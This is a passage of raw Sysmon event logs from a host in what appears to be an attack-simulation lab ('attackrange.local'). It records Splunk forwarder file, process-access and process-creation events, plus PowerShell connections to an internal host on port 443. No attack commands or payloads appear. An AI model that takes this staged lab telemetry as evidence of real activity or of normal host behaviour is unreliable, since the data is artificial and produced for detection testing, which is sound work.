Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6A41210F5D053312D9F5737848B662C,SHA256=AB77AD55D7705662D8B155D28FE0AAB423227AE81FABFAD393BBF12A2EB629F5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498519Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:14.574{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=20C10C20D774DDC3D55714E4F97BB68E,SHA256=FD55DCD236CDCB4CA304D63D62BE97829384CF97DC975E6B9E88A8FEA5CBD47E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498522Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:15.840{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=042B51F89961DB8C78788C218696C953,SHA256=3113BA06A4065DE0551D107D4B294636D26257841C517B373DED0B91627BF9BA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498521Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:45.049{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50653-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498523Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:16.870{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
--ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036498577Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:37.344{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4B07EDCEF5A08EB87A8A8DDB9E6A5BC,SHA256=67749BE513CDFC33340627FC1AA3828B63F7798D29B26CC1396248B33900358F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498598Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:38.826{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=852398A99F0FC61E000326EADFFD88AB,SHA256=3F2A07ECA2461AACD9CEA1C9072E8A474B5B34C9C6D7B4283A285DCE0C0F43FE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498597Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:38.826{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2D8FB8FA30E18168A973E8C2C68CE70B,SHA256=FE1FCFE0DA669C614E8ACA9352FFDAB9C9DDDB60DBB3CFD9381567A083C48B12,IMPHASH=00000000000000000000000000000000falsefalse - insufficient 
disk space 10341000x800000000000000036498596Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:38.689{B81B27B7-A21E-6140-B156-04000000C801}4404728C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498595Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:38.511{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A21E-6140-B156-04000000C801}4404C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498594Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:22:38.511{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498593Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:38.511{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498592Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:22:38.511{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498591Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:38.511{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498590Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:22:38.511{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A21E-6140-B156-04000000C801}4404C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498589Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:38.511{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A21E-6140-B156-04000000C801}4404C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498588Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:38.506{B81B27B7-A21E-6140-B156-04000000C801}4404C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036498587Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:38.374{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9ADF351BC966B3EABB321A498BF28A8B,SHA256=49F08BE0E5BD1AE12D4394AAAC071D4758DF31DBC10F3747DF5BE227BA04C677,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498612Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:09.864{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50663-false10.0.1.12-8000- 10341000x800000000000000036498611Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:22:39.594{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498610Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:39.594{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498609Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:22:39.594{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036498608Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:39.457{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B736824DA72202F9EE4CD41B4F2159F9,SHA256=1CEA0BC0F875D593E4A4EEA70567F1619524512386368EBA48659E2168DAD4F7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498607Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:39.388{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC8E39F244BC54EA15B046A95AA22983,SHA256=5B3CB0EE353D0FA29844BF0905E7AE0C76A3BC08433FB788526F23F66E125C95,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
10341000x800000000000000036498606Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:39.189{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A21F-6140-B256-04000000C801}5020C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498605Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:39.189{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498604Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:22:39.189{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498603Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:39.189{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498602Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:22:39.189{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498601Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:39.189{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A21F-6140-B256-04000000C801}5020C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498600Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:39.189{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A21F-6140-B256-04000000C801}5020C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498599Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:39.174{B81B27B7-A21F-6140-B256-04000000C801}5020C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000036498615Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:23:10.135{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50664-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498614Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:40.412{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99CE27137596E512AF62AD7154028BC2,SHA256=83AE2858E185598D149895E2CDB38AB5B4847C56517F9BFD66DD9A1FD37C9545,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498613Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:40.194{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=852398A99F0FC61E000326EADFFD88AB,SHA256=3F2A07ECA2461AACD9CEA1C9072E8A474B5B34C9C6D7B4283A285DCE0C0F43FE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498616Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:41.430{B81B27B7-4024-611D-7300-00000000C801}2188NT 